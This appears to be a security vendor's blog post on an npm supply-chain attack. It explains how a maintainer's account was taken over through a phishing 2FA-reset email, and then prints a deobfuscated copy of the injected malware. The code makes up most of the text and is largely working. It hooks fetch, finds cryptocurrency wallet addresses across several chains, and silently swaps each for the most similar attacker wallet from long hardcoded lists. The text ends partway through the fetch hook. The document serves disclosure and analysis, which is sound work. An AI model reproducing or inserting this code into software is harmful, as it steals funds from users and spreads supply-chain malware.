Sarah Gooding
Olivia Brown
Kush Pandya
Philipp Burckhardt
Peter van der Zee
Douglas Coburn
September 8, 2025
Socket has detected a supply chain attack in progress targeting the npm ecosystem. The account of prolific maintainer Qix has been compromised, and attackers have already published malicious versions of widely used packages. These packages generally receive 2-3 billion downloads per week.
Many of the compromised packages are ones Qix co-maintains with Sindre Sorhus, the most popular maintainer on npm by download count. These packages are foundational dependencies that power a huge portion of the JavaScript ecosystem, with hundreds of millions of downloads every week.
The overlap with such high-profile projects significantly increases the blast radius of this incident. By compromising Qix, the attackers gained the ability to push malicious versions of packages that are indirectly depended on by countless applications, libraries, and frameworks.
Given the scope and the selection of packages impacted, this appears to be a targeted attack designed to maximize reach across the ecosystem.
The following packages and versions have been identified as compromised:
The affected maintainer confirmed that he was compromised via a 2FA reset email that appeared to be legitimate. It originated from support [at] npmjs [dot] help.
The phishing email looked convincing at first glance. It spoofed npm branding and warned that outdated 2FA credentials would soon cause the account to be locked. The message included a prominent “Update 2FA Now” link.
This shows how easily credible-looking 2FA reset emails can slip past even experienced maintainers, and why attackers continue to rely on phishing as a way to compromise high-value accounts in the open source ecosystem.
From our analysis, it appears the malicious code is exactly the same across all compromised packages. Once deobfuscated, the intent becomes clear. Simply put, the actor swaps any crypto transactions to their own address, redirecting any currency to their accounts.
Here is a version of the deobfuscated code:
import {
default as ansiRegex,
}
from 'ansi-regex';
const regex = ansiRegex({ onlyFirst: true });
const hasAnsi = function(string) {
return regex.test(string);
};
export {
hasAnsi as default,
};
// rest is malware:
const apply = function(_0x562199, ..._0x1555b8) {
const tmpReturnArg$45 = _0x562199(..._0x1555b8);
return tmpReturnArg$45;
};
const _0x19ca67 = function(content, isObject) {
try {
if (isObject) {
if (!(content === null)) {
return JSON.parse(apply(replaceCryptoHashes, JSON.stringify(content)));
}
}
if ((typeof content) === `string`) {
return replaceCryptoHashes(content);
} else {
return content;
}
} catch (_0x2abc9c) {
return content;
}
};
const replaceCryptoHashes = function(content) {
const _0x4477fc = [`0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976`, `0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024`, `0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B`, `0x30F895a2C66030795131FB66CBaD6a1f91461731`, `0x57394449fE8Ee266Ead880D5588E43501cb84cC7`, `0xCd422cCC9f6e8f30FfD6F68C0710D3a7F24a026A`, `0x7C502F253124A88Bbb6a0Ad79D9BeD279d86E8f4`, `0xe86749d6728d8b02c1eaF12383c686A8544de26A`, `0xa4134741a64F882c751110D3E207C51d38f6c756`, `0xD4A340CeBe238F148034Bbc14478af59b1323d67`, `0xB00A433e1A5Fc40D825676e713E5E351416e6C26`, `0xd9Df4e4659B1321259182191B683acc86c577b0f`, `0x0a765FA154202E2105D7e37946caBB7C2475c76a`, `0xE291a6A58259f660E8965C2f0938097030Bf1767`, `0xe46e68f7856B26af1F9Ba941Bc9cd06F295eb06D`, `0xa7eec0c4911ff75AEd179c81258a348c40a36e53`, `0x3c6762469ea04c9586907F155A35f648572A0C3E`, `0x322FE72E1Eb64F6d16E6FCd3d45a376efD4bC6b2`, `0x51Bb31a441531d34210a4B35114D8EF3E57aB727`, `0x314d5070DB6940C8dedf1da4c03501a3AcEE21E1`, `0x75023D76D6cBf88ACeAA83447C466A9bBB0c5966`, `0x1914F36c62b381856D1F9Dc524f1B167e0798e5E`, `0xB9e9cfd931647192036197881A9082cD2D83589C`, `0xE88ae1ae3947B6646e2c0b181da75CE3601287A4`, `0x0D83F2770B5bDC0ccd9F09728B3eBF195cf890e2`, `0xe2D5C35bf44881E37d7183DA2143Ee5A84Cd4c68`, `0xd21E6Dd2Ef006FFAe9Be8d8b0cdf7a667B30806d`, `0x93Ff376B931B92aF91241aAf257d708B62D62F4C`, `0x5C068df7139aD2Dedb840ceC95C384F25b443275`, `0x70D24a9989D17a537C36f2FB6d8198CC26c1c277`, `0x0ae487200606DEfdbCEF1A50C003604a36C68E64`, `0xc5588A6DEC3889AAD85b9673621a71fFcf7E6B56`, `0x3c23bA2Db94E6aE11DBf9cD2DA5297A09d7EC673`, `0x5B5cA7d3089D3B3C6393C0B79cDF371Ec93a3fd3`, `0x4Cb4c0E7057829c378Eb7A9b174B004873b9D769`, `0xd299f05D1504D0B98B1D6D3c282412FD4Df96109`, `0x241689F750fCE4A974C953adBECe0673Dc4956E0`, `0xBc5f75053Ae3a8F2B9CF9495845038554dDFb261`, `0x5651dbb7838146fCF5135A65005946625A2685c8`, `0x5c9D146b48f664f2bB4796f2Bb0279a6438C38b1`, `0xd2Bf42514d35952Abf2082aAA0ddBBEf65a00BA3`, `0xbB1EC85a7d0aa6Cd5ad7E7832F0b4c8659c44cc9`, `0x013285c02ab81246F1D68699613447CE4B2B4ACC`, `0x97A00E100BA7bA0a006B2A9A40f6A0d80869Ac9e`, `0x4Bf0C0630A562eE973CE964a7d215D98ea115693`, `0x805aa8adb8440aEA21fDc8f2348f8Db99ea86Efb`, `0xae9935793835D5fCF8660e0D45bA35648e3CD463`, `0xB051C0b7dCc22ab6289Adf7a2DcEaA7c35eB3027`, `0xf7a82C48Edf9db4FBe6f10953d4D889A5bA6780D`, `0x06de68F310a86B10746a4e35cD50a7B7C8663b8d`, `0x51f3C0fCacF7d042605ABBE0ad61D6fabC4E1F54`, `0x49BCc441AEA6Cd7bC5989685C917DC9fb58289Cf`, `0x7fD999f778c1867eDa9A4026fE7D4BbB33A45272`, `0xe8749d2347472AD1547E1c6436F267F0EdD725Cb`, `0x2B471975ac4E4e29D110e43EBf9fBBc4aEBc8221`, `0x02004fE6c250F008981d8Fc8F9C408cEfD679Ec3`, `0xC4A51031A7d17bB6D02D52127D2774A942987D39`, `0xa1b94fC12c0153D3fb5d60ED500AcEC430259751`, `0xdedda1A02D79c3ba5fDf28C161382b1A7bA05223`, `0xE55f51991C8D01Fb5a99B508CC39B8a04dcF9D04`];
const _0x264994 = [`1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx`, `1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd`, `1Dk12ey2hKWJctU3V8Akc1oZPo1ndjbnjP`, `1NBvJqc1GdSb5uuX8vT7sysxtT4LB8GnuY`, `1Mtv6GsFsbno9XgSGuG6jRXyBYv2tgVhMj`, `1BBAQm4DL78JtRdJGEfzDBT2PBkGyvzf4N`, `1KkovSeka94yC5K4fDbfbvZeTFoorPggKW`, `18CPyFLMdncoYccmsZPnJ5T1hxFjh6aaiV`, `1BijzJvYU2GaBCYHa8Hf3PnJh6mjEd92UP`, `1Bjvx6WXt9iFB5XKAVsU3TgktgeNbzpn5N`, `19fUECa9aZCQxcLeo8FZu8kh5kVWheVrg8`, `1DZEep7GsnmBVkbZR3ogeBQqwngo6x4XyR`, `1GX1FWYttd65J26JULr9HLr98K7VVUE38w`, `14mzwvmF2mUd6ww1gtanQm8Bxv3ZWmxDiC`, `1EYHCtXyKMMhUiJxXJH4arfpErNto5j87k`, `19D1QXVQCoCLUHUrzQ4rTumqs9jBcvXiRg`, `16mKiSoZNTDaYLBQ5LkunK6neZFVV14b7X`, `18x8S4yhFmmLUpZUZa3oSRbAeg8cpECpne`, `1EkdNoZJuXTqBeaFVzGwp3zHuRURJFvCV8`, `13oBVyPUrwbmTAbwxVDMT9i6aVUgm5AnKM`, `1DwsWaXLdsn4pnoMtbsmzbH7rTj5jNH6qS`, `13wuEH28SjgBatNppqgoUMTWwuuBi9e4tJ`, `154jc6v7YwozhFMppkgSg3BdgpaFPtCqYn`, `1AP8zLJE6nmNdkfrf1piRqTjpasw7vk5rb`, `19F8YKkU7z5ZDAypxQ458iRqH2ctGJFVCn`, `17J3wL1SapdZpT2ZVX72Jm5oMSXUgzSwKS`, `16z8D7y3fbJsWFs3U8RvBF3A8HLycCW5fH`, `1PYtCvLCmnGDNSVK2gFE37FNSf69W2wKjP`, `143wdqy6wgY3ez8Nm19AqyYh25AZHz3FUp`, `1JuYymZbeoDeH5q65KZVG3nBhYoTK9YXjm`, `1PNM2L1bpJQWipuAhNuB7BZbaFLB3LCuju`, `19onjpqdUsssaFKJjwuAQGi2eS41vE19oi`, `1JQ15RHehtdnLAzMcVT9kU8qq868xFEUsS`, `1LVpMCURyEUdE8VfsGqhMvUYVrLzbkqYwf`, `1KMcDbd2wecP4Acoz9PiZXsBrJXHbyPyG6`, `1DZiXKhBFiKa1f6PTGCNMKSU1xoW3Edb7Z`, `174bEk62kr8dNgiduwHgVzeLgLQ38foEgZ`, `17cvmxcjTPSBsF1Wi2HfcGXnpLBSzbAs6p`, `1NoYvnedUqNshKPZvSayfk8YTQYvoB2wBc`, `13694eCkAtBRkip8XdPQ8ga99KEzyRnU6a`];
const _0x2e3cca = [`bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm`, `bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9`, `bc1q4rllc9q0mxs827u6vts2wjvvmel0577tdsvltx`, `bc1qj8zru33ngjxmugs4sxjupvd9cyh84ja0wjx9c4`, `bc1qc972tp3hthdcufsp9ww38yyer390sdc9cvj8ar`, `bc1qw0z864re8yvrjqmcw5fs6ysndta2avams0c6nh`, `bc1qzdd8c7g2g9mnnxy635ndntem2827ycxxyn3v4h`, `bc1qaavgpwm98n0vtaeua539gfzgxlygs8jpsa0mmt`, `bc1qrdlkyhcrx4n2ksfjfh78xnqrefvsr34nf2u0sx`, `bc1q9ytsyre66yz56x3gufhqks7gqd8sa8uk4tv5fh`, `bc1qfrvsj2dkey2dg8ana0knczzplcqr7cgs9s52vq`, `bc1qg7lkw04hg5yggh28ma0zvtkeg95k0yefqmvv2f`, `bc1qmeplum3jy2vrlyzw4vhrcgeama35tr9kw8yfrn`, `bc1qamqx0h8rxfcs4l56egrpau4ryqu4r642ttmxq4`, `bc1qsaxgtck26mgecgfvp9ml4y5ljyl8ylpdglqz30`, `bc1qsz90ulta8dx5k8xzzjqruzahav2vxchtk2l8v7`, `bc1q3ad2zyc5mpc9nnzmmtxqpu467jeh4m928r7qf4`, `bc1qlrdqrulwmvfg86rmp77k8npdefns52ykk8cxs6`, `bc1q5hqxk5ugvf2d3y6qj2a7cy7u79ckusu9eknpsr`, `bc1qszm3nugttmtpkq77dhphtqg4u7vuhxxcrh7f79`, `bc1qqc09xnyafq0y4af3x7j5998tglxcanjuzy974m`, `bc1qqqh29zxfzxk0fvmq9d7hwedh5yz44zhf7e23qz`, `bc1qsg57tpvfj6gysrw5w4sxf3dweju40g87uuclvu`, `bc1qje95nehs8y0wvusp2czr25p7kghk6j3cvgugy5`, `bc1qwrnchp96p38u8ukp8jc8cq22q35n3ajfav0pzf`, `bc1q6l99s704jccclxx5rc2x2c5shlgs2pg0fpnflk`, `bc1qeuk2u6xl4rgfq0x9yc37lw49kutnd8gdlxt9st`, `bc1qxul8lwxvt7lt9xuge0r2jls7evrwyyvcf2ah0u`, `bc1qcplvxyzs9w09g6lpglj6xxdfxztfwjsgz95czd`, `bc1q9ca9ae2cjd3stmr9lc6y527s0x6vvqys6du00u`, `bc1qmap3cqss3t4vetg8z9s995uy62jggyxjk29jkp`, `bc1qg3c6c7y5xeqkxnjsx9ymclslr2sncjrxjylkej`, `bc1q9zx63qdjwldxp4s9egeqjelu3y5yqsajku8m29`, `bc1ql2awtv7nzcp2dqce3kny2ra3dz946c9vg2yukq`, `bc1qhytpe64tsrrvgwm834q35w6607jc6azqtnvl2a`, `bc1q4rlgfgjwg9g2pqwqkf5j9hq6ekn39rjmzv09my`, `bc1q28ks0u6fhvv7hktsavnfpmu59anastfj5sq8dw`, `bc1qjqfpxvl2j2hzx2cxeqhchrh02dcjy3z5k6gv55`, `bc1q8zznzs9z93xpkpunrmeqp6fg54s3q7dkh9z9xw`, `bc1qt4c4e6xwt5dz4p629ndz9zmeep2kmvqgy53037`];
const _0x3ee86f = [`TB9emsCq6fQw6wRk4HBxxNnU6Hwt1DnV67`, `TSfbXqswodrpw8UBthPTRRcLrqWpnWFY3y`, `TYVWbDbkapcKcvbMfdbbcuc3PE1kKefvDH`, `TNaeGxNujpgPgcfetYwCNAZF8BZjAQqutc`, `TJ1tNPVj7jLK2ds9JNq15Ln6GJV1xYrmWp`, `TGExvgwAyaqwcaJmtJzErXqfra66YjLThc`, `TC7K8qchM7YXZPdZrbUY7LQwZaahdTA5tG`, `TQuqKCAbowuQYEKB9aTnH5uK4hNvaxDCye`, `TFcXJysFgotDu6sJu4zZPAvr9xHCN7FAZp`, `TLDkM4GrUaA13PCHWhaMcGri7H8A8HR6zR`, `TPSLojAyTheudTRztqjhNic6rrrSLVkMAr`, `TY2Gs3RVwbmcUiDpxDhchPHF1CVsGxU1mo`, `TCYrFDXHBrQkqCPNcp6V2fETk7VoqjCNXw`, `TKcuWWdGYqPKe98xZCWkmhc1gKLdDYvJ2f`, `TP1ezNXDeyF4RsM3Bmjh4GTYfshf5hogRJ`, `TJcHbAGfavWSEQaTTLotG7RosS3iqV5WMb`, `TD5U7782gp7ceyrsKwekWFMWF9TjhC6DfP`, `TEu3zgthJE32jfY6bYMYGNC7BU2yEXVBgW`, `TK5r74dFyMwFSTaJF6dmc2pi7A1gjGTtJz`, `TBJH4pB4QPo96BRA7x6DghEv4iQqJBgKeW`, `TKBcydgFGX9q3ydaPtxht1TRAmcGybRozt`, `TQXoAYKPuzeD1X2c4KvQ4gXhEnya3AsYwC`, `TJCevwYQhzcSyPaVBTa15y4qNY2ZxkjwsZ`, `THpdx4MiWbXtgkPtsrsvUjHF5AB4u7mx3E`, `TWpCDiY8pZoY9dVknsy3U4mrAwVm8mCBh6`, `TK5zyFYoyAttoeaUeWGdpRof2qRBbPSV7L`, `TAzmtmytEibzixFSfNvqqHEKmMKiz9wUA9`, `TCgUwXe3VmLY81tKBrMUjFBr1qPnrEQFNK`, `TTPWAyW3Q8MovJvDYgysniq41gQnfRn21V`, `TWUJVezQta4zEX94RPmFHF2hzQBRmYiEdn`, `TPeKuzck7tZRXKh2GP1TyoePF4Rr1cuUAA`, `TJUQCnHifZMHEgJXSd8SLJdVAcRckHGnjt`, `TCgX32nkTwRkapNuekTdk1TByYGkkmcKhJ`, `TFDKvuw86wduSPZxWTHD9N1TqhXyy9nrAs`, `TQVpRbBzD1au3u8QZFzXMfVMpHRyrpemHL`, `TSE2VkcRnyiFB4xe8an9Bj1fb6ejsPxa9Z`, `THe32hBm9nXnzzi6YFqYo8LX77CMegX3v5`, `TXfcpZtbYfVtLdGPgdoLm6hDHtnrscvAFP`, `TXgVaHDaEyXSm1LoJEqFgKWTKQQ1jgeQr7`, `TD5cRTn9dxa4eodRWszGiKmU4pbpSFN87P`];
const _0x4a9d96 = [`LNFWHeiSjb4QB4iSHMEvaZ8caPwtz4t6Ug`, `LQk8CEPMP4tq3mc8nQpsZ1QtBmYbhg8UGR`, `LMAJo7CV5F5scxJsFW67UsY2RichJFfpP6`, `LUvPb1VhwsriAm3ni77i3otND2aYLZ8fHz`, `LhWPifqaGho696hFVGTR1KmzKJ8ps7ctFa`, `LZZPvXLt4BtMzEgddYnHpUWjDjeD61r5aQ`, `LQfKhNis7ZKPRW6H3prbXz1FJd29b3jsmT`, `LSihmvTbmQ9WZmq6Rjn35SKLUdBiDzcLBB`, `Ldbnww88JPAP1AUXiDtLyeZg9v1tuvhHBP`, `LR3YwMqnwLt4Qdn6Ydz8bRFEeXvpbNZUvA`, `Lbco8vJ56o1mre6AVU6cF7JjDDscnYHXLP`, `LfqFuc3sLafGxWE8vdntZT4M9NKq6Be9ox`, `LLcmXxj8Zstje6KqgYb11Ephj8bGdyF1vP`, `LcJwR1WvVRsnxoe1A66pCzeXicuroDP6L6`, `LUNKimRyxBVXLf9gp3FZo2iVp6D3yyzJLJ`, `LY1NnVbdywTNmq45DYdhssrVENZKv7Sk8H`, `LNmMqhqpyDwb1zzZReuA8aVUxkZSc4Ztqq`, `LdxgXRnXToLMBML2KpgGkdDwJSTM6sbiPE`, `LZMn8hLZ2kVjejmDZiSJzJhHZjuHq8Ekmr`, `LVnc1MLGDGKs2bmpNAH7zcHV51MJkGsuG9`, `LRSZUeQb48cGojUrVsZr9eERjw4K1zAoyC`, `LQpGaw3af1DQiKUkGYEx18jLZeS9xHyP9v`, `LiVzsiWfCCkW2kvHeMBdawWp9TE8uPgi6V`, `LY32ncFBjQXhgCkgTAd2LreFv3JZNTpMvR`, `LdPtx4xqmA4HRQCm3bQ9PLEneMWLdkdmqg`, `LYcHJk7r9gRbg2z3hz9GGj91Po6TaXDK3k`, `LMhCVFq5fTmrwQyzgfp2MkhrgADRAVCGsk`, `LPv1wSygi4vPp9UeW6EfWwepEeMFHgALmN`, `Lf55UbTiSTjnuQ8uWzUBtzghztezEfSLvT`, `LdJHZeBQovSYbW1Lei6CzGAY4d3mUxbNKs`, `LbBxnFaR1bZVN2CquNDXGe1xCuu9vUBAQw`, `LWWWPK2SZZKB3Nu8pHyq2yPscVKvex5v2X`, `LYN4ESQuJ1TbPxQdRYNrghznN8mQt8WDJU`, `LiLzQs4KU79R5AUn9jJNd7EziNE7r32Dqq`, `LeqNtT4aDY9oM1G5gAWWvB8B39iUobThhe`, `LfUdSVrimg54iU7MhXFxpUTPkEgFJonHPV`, `LTyhWRAeCRcUC9Wd3zkmjz3AhgX6J18kxZ`, `Lc2LtsEJmPYay1oj7v8xj16mSV15BwHtGu`, `LVsGi1QVXucA6v9xsjwaAL8WYb7axdekAK`, `LewV6Gagn52Sk8hzPHRSbBjUpiNAdqmB9z`];
const _0x553dcb = [`bitcoincash:qpwsaxghtvt6phm53vfdj0s6mj4l7h24dgkuxeanyh`, `bitcoincash:qq7dr7gu8tma7mvpftq4ee2xnhaczqk9myqnk6v4c9`, `bitcoincash:qpgf3zrw4taxtvj87y5lcaku77qdhq7kqgdga5u6jz`, `bitcoincash:qrkrnnc5kacavf5pl4n4hraazdezdrq08ssmxsrdsf`, `bitcoincash:qqdepnkh89dmfxyp4naluvhlc3ynej239sdu760y39`, `bitcoincash:qqul8wuxs4ec8u4d6arkvetdmdh4ppwr0ggycetq97`, `bitcoincash:qq0enkj6n4mffln7w9z6u8vu2mef47jwlcvcx5f823`, `bitcoincash:qrc620lztlxv9elhj5qzvmf2cxhe7egup5few7tcd3`, `bitcoincash:qrf3urqnjl4gergxe45ttztjymc8dzqyp54wsddp64`, `bitcoincash:qr7mkujcr9c38ddfn2ke2a0sagk52tllesderfrue8`, `bitcoincash:qqgjn9yqtud5mle3e7zhmagtcap9jdmcg509q56ynt`, `bitcoincash:qpuq8uc9ydxszny5q0j4actg30he6uhffvvy0dl7er`, `bitcoincash:qz0640hjl2m3n2ca26rknljpr55gyd9pjq89g6xhrz`, `bitcoincash:qq0j6vl2ls2g8kkhkvpcfyjxns5zq03llgsqdnzl4s`, `bitcoincash:qq8m8rkl29tcyqq8usfruejnvx27zxlpu52mc9spz7`, `bitcoincash:qpudgp66jjj8k9zec4na3690tvu8ksq4fq8ycpjzed`, `bitcoincash:qqe3qc9uk08kxnng0cznu9xqqluwfyemxym7w2e3xw`, `bitcoincash:qpukdxh30d8dtj552q2jet0pqvcvt64gfujaz8h9sa`, `bitcoincash:qqs4grdq56y5nnamu5d8tk450kzul3aulyz8u66mjc`, `bitcoincash:qp7rhhk0gcusyj9fvl2ftr06ftt0pt8wgumd8ytssd`, `bitcoincash:qpmc3y5y2v7h3x3sgdg7npau034fsggwfczvuqtprl`, `bitcoincash:qzum0qk4kpauy8ljspmkc5rjxe5mgam5xg7xl5uq2g`, `bitcoincash:qqjqp8ayuky5hq4kgrarpu40eq6xjrneuurc43v9lf`, `bitcoincash:qqxu6a3f0240v0mwzhspm5zeneeyecggvufgz82w7u`, `bitcoincash:qpux2mtlpd03d8zxyc7nsrk8knarnjxxts2fjpzeck`, `bitcoincash:qpcgcrjry0excx80zp8hn9vsn4cnmk57vylwa5mtz3`, `bitcoincash:qpjj6prm5menjatrmqaqx0h3zkuhdkfy75uauxz2sj`, `bitcoincash:qp79qg7np9mvr4mg78vz8vnx0xn8hlkp7sk0g86064`, `bitcoincash:qr27clvagvzra5z7sfxxrwmjxy026vltucdkhrsvc7`, `bitcoincash:qrsypfz3lqt8xtf8ej5ftrqyhln577me6v640uew8j`, `bitcoincash:qrzfrff4czjn6ku0tn2u3cxk7y267enfqvx6zva5w6`, `bitcoincash:qr7exs4az754aknl3r5gp9scn74dzjkcrgql3jpv59`, `bitcoincash:qq35fzg00mzcmwtag9grmwljvpuy5jm8kuzfs24jhu`, `bitcoincash:qra5zfn74m7l85rl4r6wptzpnt2p22h7552swkpa7l`, `bitcoincash:qzqllr0fsh9fgfvdhmafx32a0ddtkt52evnqd7w7h7`, `bitcoincash:qpjdcwld84wtd5lk00x8t7qp4eu3y0xhnsjjfgrs7q`, `bitcoincash:qrgpm5y229xs46wsx9h9mlftedmsm4xjlu98jffmg3`, `bitcoincash:qpjl9lkjjp4s6u654k3rz06rhqcap849jg8uwqmaad`, `bitcoincash:qra5uwzgh8qus07v3srw5q0e8vrx5872k5cxguu3h5`, `bitcoincash:qz6239jkqf9qpl2axk6vclsx3gdt8cy4z5rag98u2r`];
const _0x514d7d = [`5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6`, `98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ`, `Gs7z9TTJwAKyxN4G3YWPFfDmnUo3ofu8q2QSWfdxtNUt`, `CTgjc8kegnVqvtVbGZfpP5RHLKnRNikArUYFpVHNebEN`, `7Nnjyhwsp8ia2W4P37iWAjpRao3Bj9tVZBZRTbBpwXWU`, `3KFBge3yEg793VqVV1P6fxV7gC9CShh55zmoMcGUNu49`, `9eU7SkkFGWvDoqSZLqoFJ9kRqJXDQYcEvSiJXyThCWGV`, `4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF`, `4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF`, `9dtS7zbZD2tK7oaMUj78MKvgUWHbRVLQ95bxnpsCaCLL`, `7mdCoRPc1omTiZdYY2xG81EvGwN7Z2yodUTX9ZmLm3fx`, `8rdABs8nC2jTwVhR9axWW7WMbGZxW7JUzNV5pRF8KvQv`, `55YtaEqYEUM7ASAZ9XmVdSBNy6F7r5zkdLsJFv2ZPtAx`, `Gr8Kcyt8UVRF1Pux7YHiK32Spm7cmnFVL6hd7LSLHqoB`, `9MRmVsciWKDvwwTaZQCK2NvJE2SeVU8W6EGFmukHTRaB`, `5j4k1Ye12dXiFMLSJpD7gFrLbv4QcUrRoKHsgo32kRFr`, `F1SEspGoVLhqJTCFQEutTcKDubw44uKnqWc2ydz4iXtv`, `G3UBJBY69FpDbwyKhZ8Sf4YULLTtHBtJUvSX4GpbTGQn`, `DZyZzbGfdMy5GTyn2ah2PDJu8LEoKPq9EhAkFRQ1Fn6K`, `HvygSvLTXPK4fvR17zhjEh57kmb85oJuvcQcEgTnrced`];
const obj = Object.entries({
ethereum: new RegExp(`\\b0x[a-fA-F0-9]{40}\\b`, `g`),
bitcoinLegacy: new RegExp(`\\b1[a-km-zA-HJ-NP-Z1-9]{25,34}\\b`, `g`),
bitcoinSegwit: new RegExp(`\\b(3[a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{11,71})\\b`, `g`),
tron: new RegExp(`((?<!\\w)[T][1-9A-HJ-NP-Za-km-z]{33})`, `g`),
bch: new RegExp(`bitcoincash:[qp][a-zA-Z0-9]{41}`, `g`),
ltc: new RegExp(`(?<!\\w)ltc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{11,71}\\b`, `g`),
ltc2: new RegExp(`(?<!\\w)[mlML][a-km-zA-HJ-NP-Z1-9]{25,34}`, `g`),
solana: new RegExp(`((?<!\\w)[4-9A-HJ-NP-Za-km-z][1-9A-HJ-NP-Za-km-z]{32,44})`, `g`),
solana2: new RegExp(`((?<!\\w)[3][1-9A-HJ-NP-Za-km-z]{35,44})`, `g`),
solana3: new RegExp(`((?<!\\w)[1][1-9A-HJ-NP-Za-km-z]{35,44})`, `g`),
});
for (const [_0x17ccd4, rex] of obj) {
const regexResult = content.match(rex);
for (const identifiedVictimAddress of regexResult) {
if (_0x17ccd4 == `ethereum`) {
if (!_0x4477fc.includes(identifiedVictimAddress)) {
content = content.replace(identifiedVictimAddress, findNearestAddressLevenshtein(identifiedVictimAddress, _0x4477fc));
}
}
if (_0x17ccd4 == `bitcoinLegacy`) {
if (!_0x264994.includes(identifiedVictimAddress)) {
content = content.replace(identifiedVictimAddress, findNearestAddressLevenshtein(identifiedVictimAddress, _0x264994));
}
}
if (_0x17ccd4 == `bitcoinSegwit`) {
if (!_0x2e3cca.includes(identifiedVictimAddress)) {
content = content.replace(identifiedVictimAddress, findNearestAddressLevenshtein(identifiedVictimAddress, _0x2e3cca));
}
}
if (_0x17ccd4 == `tron`) {
if (!_0x3ee86f.includes(identifiedVictimAddress)) {
content = content.replace(identifiedVictimAddress, findNearestAddressLevenshtein(identifiedVictimAddress, _0x3ee86f));
}
}
if (_0x17ccd4 == `ltc`) {
if (!_0x4a9d96.includes(identifiedVictimAddress)) {
content = content.replace(identifiedVictimAddress, findNearestAddressLevenshtein(identifiedVictimAddress, _0x4a9d96));
}
}
if (_0x17ccd4 == `ltc2`) {
if (!_0x4a9d96.includes(identifiedVictimAddress)) {
content = content.replace(identifiedVictimAddress, findNearestAddressLevenshtein(identifiedVictimAddress, _0x4a9d96));
}
}
if (_0x17ccd4 == `bch`) {
if (!_0x553dcb.includes(identifiedVictimAddress)) {
content = content.replace(identifiedVictimAddress, findNearestAddressLevenshtein(identifiedVictimAddress, _0x553dcb));
}
}
const _0x35f871 = [..._0x4477fc, ..._0x264994, ..._0x2e3cca, ..._0x3ee86f, ..._0x4a9d96, ..._0x553dcb].includes(identifiedVictimAddress);
if (_0x17ccd4 == `solana`) {
if (!_0x35f871) {
if (!_0x514d7d.includes(identifiedVictimAddress)) {
content = content.replace(identifiedVictimAddress, findNearestAddressLevenshtein(identifiedVictimAddress, _0x514d7d));
}
}
}
if (_0x17ccd4 == `solana2`) {
if (!_0x35f871) {
if (!_0x514d7d.includes(identifiedVictimAddress)) {
content = content.replace(identifiedVictimAddress, findNearestAddressLevenshtein(identifiedVictimAddress, _0x514d7d));
}
}
}
if (_0x17ccd4 == `solana3`) {
if (_0x35f871) {
if (!_0x514d7d.includes(identifiedVictimAddress)) {
content = content.replace(identifiedVictimAddress, findNearestAddressLevenshtein(identifiedVictimAddress, _0x514d7d));
}
}
}
}
}
}
return content;
};
/**
* Levenshtein distance helper
* Given an input address and a list of candidate addresses, finds the closest one.
*
* Pick the closest attacker wallet to reduce suspicion.
*/
const findNearestAddressLevenshtein = function(identifiedVictimAddress, arrOfHashes) {
let _0xff60d1 = Infinity;
let _0x5be3d3 = null;
for (const hash of arrOfHashes) {
const addr_lc = identifiedVictimAddress.toLowerCase();
const hash_lc = hash.toLowerCase();
const tmpReturnArg$22 = addr_lc.length + 1;
const tmpMCP$67 = function() {
const tmpReturnArg$15 = Array(hash_lc.length + 1).fill(0);
return tmpReturnArg$15;
};
const _0x50715b = $Array_from({ length: tmpReturnArg$22 }, tmpMCP$67);
let pointer = 0;
while (true) {
if (pointer <= addr_lc.length) {
const tmpAssignComMemLhsObj = _0x50715b[pointer];
tmpAssignComMemLhsObj[0] = pointer;
pointer = pointer + 1;
} else {
break;
}
}
let pointer2 = 0;
while (true) {
if (pointer2 <= hash_lc.length) {
const tmpAssignMemLhsObj = _0x50715b[0];
tmpAssignMemLhsObj[pointer2] = pointer2;
pointer2 = pointer2 + 1;
} else {
break;
}
}
// Copy
let a = 1;
while (true) {
if (a <= addr_lc.length) {
let b = 1;
while (true) {
if (b <= hash_lc.length) {
const tmpCalleeParam$607 = a - 1;
const tmpMCP$83 = addr_lc[tmpCalleeParam$607];
const tmpCalleeParam$609 = b - 1;
const tmpMCP$85 = hash_lc[tmpCalleeParam$609];
const tmpAssignComputedObj = _0x50715b[a];
const tmpCalleeParam$613 = a - 1;
const tmpCompObj$607 = _0x50715b[tmpCalleeParam$613];
if (tmpMCP$83 === tmpMCP$85) {
const tmpCalleeParam$611 = b - 1;
const tmpAssignComputedRhs = tmpCompObj$607[tmpCalleeParam$611];
tmpAssignComputedObj[b] = tmpAssignComputedRhs;
} else {
const tmpMCP$99 = tmpCompObj$607[b];
const tmpCompObj$615 = _0x50715b[a];
const tmpCalleeParam$617 = b - 1;
const tmpMCP$101 = tmpCompObj$615[tmpCalleeParam$617];
const tmpCalleeParam$621 = a - 1;
const tmpCompObj$617 = _0x50715b[tmpCalleeParam$621];
const tmpCalleeParam$619 = b - 1;
const tmpMCP$97 = $Math_min(tmpMCP$99, tmpMCP$101, tmpCompObj$617[tmpCalleeParam$619]);
const tmpAssignComputedRhs$1 = 1 + tmpMCP$97;
tmpAssignComputedObj[b] = tmpAssignComputedRhs$1;
}
b = b + 1;
} else {
break;
}
}
a = a + 1;
} else {
break;
}
}
const tmpCalleeParam$625 = addr_lc.length;
const tmpCompObj$621 = _0x50715b[tmpCalleeParam$625];
const tmpCalleeParam$623 = hash_lc.length;
const tmpReturnArg$17 = tmpCompObj$621[tmpCalleeParam$623];
if (tmpReturnArg$17 < _0xff60d1) {
_0xff60d1 = tmpReturnArg$17;
_0x5be3d3 = hash;
}
}
return _0x5be3d3;
};
const originalFetch = fetch;
fetch = async function(...$$0) {
const args = $$0;
const fetchResult = await apply(originalFetch, ...args);
const headers = fetchResult.headers;
let contentType = headers.get(`Content-Type`) || '';
const isJSon = contentType.includes(`application/json`);
const resultClone = fetchResult.clone(); // Calling .json/.text on the result can only be done once. The clone prevents user code from breaking on this.
